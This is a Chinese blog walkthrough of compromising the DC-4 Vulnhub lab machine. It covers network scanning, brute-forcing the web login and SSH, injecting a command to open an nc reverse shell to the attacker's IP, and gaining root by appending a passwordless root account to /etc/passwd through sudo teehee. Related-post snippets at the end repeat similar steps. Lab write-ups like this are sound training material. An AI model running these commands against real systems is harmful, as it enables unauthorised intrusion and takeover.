DC-4靶机详细渗透过程

最新推荐文章于 2024-03-24 15:25:45 发布
最新推荐文章于 2024-03-24 15:25:45 发布
阅读量562 收藏 2
点赞数 2
分类专栏: 教程 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MRS_jianai/article/details/128121310
版权

1.靶机部署

kali安装:https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载: https://www.five86.com/downloads/DC-4.zip
解压后得到一个.ova的文件:
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.渗透过程

2.1 信息收集

2.1.1 探测主机

探测主机的工具有很多,常见的有arp-scan、nmap还有netdiscover

arp-scan -l

image.png

2.1.2 进行更详细的扫描:

nmap -sV -p- 192.168.11.138

image.png

2.1.3 web指纹识别:

whatweb -v 192.168.11.138

image.png

2.1.4 网站目录扫描:

dirb http://192.168.11.138 /usr/share/dirb/wordlists/big.txt

image.png

2.1.5 信息总结:

IP:192.168.11.138
开放的端口:
22:ssh服务
80:http服务
OS:Linux 3.2 - 4.9(debian)
nginx:1.15.10
其他网站目录

3.渗透测试

image.png

3.1 爆破

网站是一个登录页面,对页面进行爆破试试,使用BurpSuite进行抓包,爆破:
image.png
将抓到的数据发送到测试器:
image.png
image.png
image.png
image.png
image.png
得到账号密码:admin happy

3.2 登录网站

登录网站之后,找到一个执行命令的地方
image.png

3.3 反弹shell

打开网页源代码,可以看见我们选择的值,那么我们如果对值进行修改修改为其他命令,发现也可以执行,那我们是否也可以使用这个漏洞进行反弹shell
image.png
修改页面参数

nc -e /bin/bash 192.168.11.128 4444

image.png
成功拿到反弹shell
image.png
生成可交互式shell
python3 -c “import pty;pty.spawn(‘/bin/bash’)”;
image.png

3.4 搜集有用信息

image.png
在jim的用户文件夹里面找到类似密码本的东西
image.png

3.5 密码爆破

在端口扫描时,该主机开启了22端口,那我们可以尝试使用该密码本对jim进行爆破

hydra -l jim -P jim-passwd.txt ssh://192.168.11.138

得到用户的密码:

  • 用户名:jim
  • 密码:jibril04

image.png

3.6 登录jim用户

登录用户他提示我们有一封邮件!
image.png
查看邮箱:
发现用户Charles和密码:^xHhA&hvim0y
image.png
尝试切换用户:
image.png

3.7 提权

查找一番之后没有找到可用信息,查看自己的权限时发现自己可以以管理员身份使用teehee
image.png
那么我们就可以在/etc/psswd里面加个root用户

echo “xiaoqiu::0:0:::/bin/bash” | sudo teehee -a /etc/passwd

image.png
切换到我们写入的用户,并进入root文件夹里面找到flag:
image.png

小秋LY
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-4靶机渗透详细教程(附靶机链接)
bwt_D的博客
03-01 5921
靶机链接:https://pan.baidu.com/s/1Bcy6_fOXj4ysZTcBIUOxpw 提取码:eefe 首先查看kali虚拟机的ip地址 ifconfig 可以看到我们kali的虚拟机ip为192.168.159.145 接着使用nmap工具进行扫描,获取靶机的IP地址 nmap -sP 192.168.159.2/24 打开靶机的虚拟机设置,选择网络适配器-高级,查看我们靶机的mac地址。与扫描的结果匹配,发现靶机的IP为192.168.159.142 继续使用namp对靶
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机渗透测试
qq_60463414的博客
07-07 2410
DC4靶机shell反弹,提权流程。
DC-4靶机进行渗透测试
zll___的博客
03-14 485
DC-4靶机进行渗透测试
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC-4-Web渗透测试靶机
01-19
总之,DC-4-Web渗透测试靶机提供了一个安全的实验平台,让学习者可以在不危害实际系统的情况下,深入理解Web渗透测试的全过程,增强网络安全防护意识和技能。在使用过程中,不断学习、实践和总结,将有助于你在网络...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC4靶机渗透测试(个人学习记录)
m0_53806046的博客
03-20 860
在执行这个命令时,如果你的桌面目录是 `/Users/your_username/Desktop`(这是 macOS 的典型路径),文件 `passwords.txt` 将会被创建或覆盖(如果已存在)在这个位置。在这里,它输出的文本是 `"***** root chmod 4777 /bin/sh"`,这看起来像是一个注释,但由于它后面跟着一个管道(`|`)操作符,实际上它是要传递给后面的程序的输入。3. **`sudo` 命令**:`sudo` 允许普通用户以超级用户(通常是 root)的权限执行命令。
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 660
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3890
DC-4靶机渗透测试详细教程
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1759
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
DC-4靶机渗透
weixin_45349299的博客
12-21 1014
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
DC-4靶机实战 渗透测试
她叫常玉莹
07-23 405
使用arp-scan查看主机 arp-scan -l 靶机ip地址为192.168.0.151,使用nmap进行扫描 目标机开放了80端口与22端口,使用浏览器访问下80端口 页面是一个表单,抓下包看一下 使用jhon的字典进行爆破 密码为happy登陆一下。 点击command可以运行命令,bp抓下数据包分析下 命令是由radio参数传入的,并且使用“+”代替“ ”(空格)。发送到repeater模块修改radio参数测试一下。 可以看到命令成功执行了,说明这里存在命令注入漏洞。在/home
DC-4靶机渗透指南(渗透测试详细操作)
jrdh的博客
12-06 4671
DC-4 靶机渗透测试,帮助读者了解DC系列的具体考察内容
DC-4靶机
最新发布
mlws1900的博客
03-24 1063
下载不下来用迅雷下载。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值